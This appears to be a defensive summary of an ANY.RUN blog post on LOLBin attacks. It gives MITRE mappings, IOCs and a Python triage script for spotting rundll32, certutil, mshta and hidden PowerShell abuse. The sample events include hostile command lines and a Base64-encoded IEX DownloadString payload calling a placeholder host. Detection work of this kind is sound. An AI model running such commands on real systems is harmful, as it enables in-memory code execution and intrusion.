LOLBin attacks abuse legitimate Windows system binaries (rundll32, certutil, mshta, etc.) to load disguised modules, decode hidden payloads, or run code entirely in memory so that malicious activity looks like normal system use. ANY.RUN’s interactive sandbox exposes these abuses quickly by showing process behavior, parent–child chains, full command lines, and in-memory actions, and yields actionable IOCs. #RUNDLL32 #CERTUTIL
Keypoints
- LOLBin attacks repurpose trusted Windows utilities (rundll32, certutil, mshta, powershell, regsvr32) to perform malicious actions while blending into normal system activity.
- Attackers use LOLBins to load disguised or renamed DLLs, decode or unpack payloads, trigger hidden PowerShell, and execute code entirely in memory.
- These techniques reduce forensic artifacts and signature coverage, increasing dwell time and making early detection difficult for SOC teams.
- ANY.RUN’s interactive sandbox reveals suspicious behavior immediately by showing process behavior, parent–child chains, full command lines, and in-memory artifacts.
- Real examples include rundll32 delivering Gh0st RAT via a disguised module, certutil decoding a disguised archive used by PXAStealer, and mshta executing an HTA that spawns hidden PowerShell with a Base64-encoded command.
- Practical defenses include behavior-based detections, a simple triage checklist (parent process, command line, execution path, decoding/script activity), sandbox confirmation, and policy controls where feasible (restricting execution from user-writable folders, constraining PowerShell).
- ANY.RUN customers report measurable SOC benefits such as faster triage, higher detection rates, and reduced MTTR by using interactive sandbox analysis to validate suspicious cases.
MITRE Techniques
- [T1218.011] Rundll32 – Used to load and run a disguised module so an attacker can execute payloads under a legitimate process; “…rundll32.exe runs the hidden module and shows clear malicious actions…”
- [T1140] Deobfuscate/Decode Files or Information – certutil.exe misused to decode a disguised file (fake PDF turned into an archive) before extraction and execution; “…certutil converts it into Invoice.pdf, which is not a document at all but a RAR archive.”
- [T1218.005] Mshta – mshta.exe used to execute HTA-based scripts that spawn hidden PowerShell with Base64-encoded commands for in-memory execution; “…mshta.exe runs gg.hta, which triggers hidden PowerShell execution…A Base64-encoded command decoded and passed into Invoke-Expression”
Indicators of Compromise
- [File names] Disguised or misleading file names used in the chains – grgfrqe.rfg (renamed DLL), hkjhn.exe (dropped in Temp)
- [Command lines] Suspicious command-line patterns observed – commandLine:"rundll32.exe*" and commandLine:"certutil.exe*-decode" (used to find similar samples)
- [Archive/password] Disguised archive and extraction context – password-protected RAR inside a file named DA 성형외과 재무 보고서.pdf ("DA Plastic Surgery Financial Report.pdf") with password iJbcsRBR84uUl9USIhj09PH0elalyHPJ
- [Script/HTA names] Loader/script artifacts – gg.hta (HTA that spawns hidden PowerShell), encoded PowerShell flags (-NoProfile -WindowStyle Hidden and a Base64 payload)
- [Tool usage patterns] Behavioral IOCs summarizing multiple instances – unusual module loads by rundll32.exe, certutil -decode usage, mshta executing .hta files (and 2 more similar command-line patterns)
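The triage checklist from the defenses key point (parent process, command line, execution path, decoding/script activity) and the command-line hunting patterns in the IOC list, as an added Python example that is not part of the ANY.RUN post: it runs those four checks over constructed process-creation events shaped like Sysmon Event ID 1 records, decodes a PowerShell -EncodedCommand payload to see what would run in memory, and offers a glob-style search that only approximates the sandbox's commandLine:"..." syntax. The paths, parent processes, user list and Base64 payload are all constructed for illustration.

```python
"""Triage process-creation events for LOLBin abuse (added example, not ANY.RUN code).

Checks: parent process, per-binary command line, execution path, decoding/script
activity. Events are constructed to resemble Sysmon Event ID 1 fields.
"""
import base64
import fnmatch
import re
from typing import Optional

# Extensions a module handed to rundll32 normally carries.
DLL_EXTS = {".dll", ".cpl", ".ocx"}

# Locations an ordinary user can write to; LOLBins rarely need files there.
USER_WRITABLE = re.compile(
    r"(?i)\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)|temp|programdata|users\\public)\\"
)

# Parents that should rarely launch a LOLBin directly (assumption: tune per estate).
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe",
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (Base64 over UTF-16LE)."""
    m = re.search(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> list:
    """Return human-readable findings for one event; an empty list means nothing odd."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    findings = []

    # 1. Parent process: who launched the LOLBin?
    if parent in SUSPICIOUS_PARENTS:
        findings.append(f"parent: {image} launched by {parent}")

    # 2. Command line, per binary.
    if image == "rundll32.exe":
        # rundll32 syntax is "<module>,<entry>"; the module is everything before the comma.
        m = re.match(r'\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+"?([^",]+?)"?\s*,', cmd, re.I)
        module = basename(m.group(1)) if m else ""
        ext = "." + module.rsplit(".", 1)[-1] if "." in module else ""
        if module and ext not in DLL_EXTS:
            findings.append(f"rundll32: module {module} has non-DLL extension {ext or '(none)'}")
    elif image == "certutil.exe":
        if re.search(r"(?i)\s-(?:decode|decodehex|encode|urlcache)\b", cmd):
            findings.append("certutil: decode/download switch used, not a certificate operation")
    elif image == "mshta.exe":
        if re.search(r"(?i)\.hta\b|https?://|javascript:|vbscript:", cmd):
            findings.append("mshta: runs an HTA or inline script")
    elif image in {"powershell.exe", "pwsh.exe"}:
        if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd):
            findings.append("powershell: hidden window")
        if re.search(r"(?i)-nop(?:rofile)?\b", cmd):
            findings.append("powershell: profile skipped")
        # 4. Decoding/script activity: look inside the encoded payload.
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(f"powershell: encoded command decodes to {decoded.strip()!r}")
            if re.search(r"(?i)\biex\b|invoke-expression|downloadstring|frombase64string", decoded):
                findings.append("powershell: decoded payload evaluates fetched/obfuscated code in memory")

    # 3. Execution path: does the command line touch user-writable locations?
    if USER_WRITABLE.search(cmd):
        findings.append(f"{image}: command line references a user-writable path")
    return findings


def hunt(events: list, pattern: str) -> list:
    """Glob-style command-line search such as 'certutil.exe*-decode'. This is a local
    approximation of the post's search patterns, not the sandbox's query engine."""
    return [e for e in events if fnmatch.fnmatchcase(e["CommandLine"].lower(), f"*{pattern.lower()}*")]


# Constructed events (not real telemetry). The PowerShell payload is encoded the way
# -EncodedCommand expects it: Base64 over UTF-16LE.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\grgfrqe.rfg,DllMain"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'certutil.exe -decode "C:\Users\bob\Downloads\report.pdf" C:\Users\bob\Downloads\Invoice.pdf'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"mshta.exe C:\Users\bob\AppData\Local\Temp\gg.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(basename(e["Image"]), "->", triage(e) or "clean")
    print("hunt certutil.exe*-decode:", len(hunt(SAMPLE_EVENTS, "certutil.exe*-decode")))
```

The benign rundll32 launch of shell32.dll from explorer.exe produces no findings, while the renamed-DLL, certutil -decode, Office-spawned mshta and hidden encoded PowerShell events each accumulate several; an analyst would escalate anything with a parent or decoding finding to sandbox confirmation rather than rely on the path check alone.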
Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/lolbin-attacks-soc-detection-guide/